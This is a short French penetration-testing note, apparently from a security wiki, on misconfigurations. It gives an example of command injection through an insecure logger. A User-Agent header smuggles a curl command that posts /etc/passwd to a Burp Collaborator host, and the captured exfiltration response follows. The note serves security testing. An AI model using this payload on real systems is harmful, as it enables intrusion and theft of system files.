🚧Misconfigurations
Cache control misconfiguration
Tentative de désinscription d'utilisateur
Injection de commande via logger non sécurisé
#Requête
GET /thispagedoesnotexist HTTP 1.1
Host: ...
User-Ageny: Mozilla/... Firefox/..."; curl -X POST -d @/etc/passwd http://my.burp.collab.com/ #
...
...
Reponse:
HTTP/1.1 404 Not Found
...
...
Reponse dans burp collab:
POST / HTTP/1.1
...
...
root:x:... [/etc/passwd]Mis à jour